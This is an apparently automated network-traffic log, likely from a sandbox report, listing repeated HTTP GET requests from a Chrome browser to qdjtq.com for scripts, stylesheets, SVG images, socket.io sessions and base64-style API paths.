Source: global trafficHTTP traffic detected: GET /modify/assets/522b5b49ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/230e1227ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/c27b6911ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/d1a234c2ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC42MTg2MTE1MDg1Nzk2NjAy HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/f4397cedtE5dP.css HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/63d4f0c9ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://qdjtq.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muYOE HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1Host: qdjtq.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://qdjtq.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: fthJU7BCcP3yw+RIpeeeDQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muYme&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/d1a234c2ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muYOE HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/52.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/53.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/62.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/assets/63d4f0c9ajMSD.js HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/63.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/64.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muYme&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/69.png HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/65.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/66.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/52.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/62.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/67.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/68.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/53.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC4xNTY5NDAyMDU5Nzc3NTExNg== HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/63.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muZBc&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/64.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/65.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/69.png HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/47.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/48.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/66.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/67.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/68.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/49.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/50.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/51.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/54.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC40NTI5MDY4NzM1NDgwODk3 HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muaSX HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/55.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/47.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8muanR&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/48.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/56.svg HTTP/1.1Host: qdjtq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qdjtq.com/modify/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modify/layout/images/49.svg HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
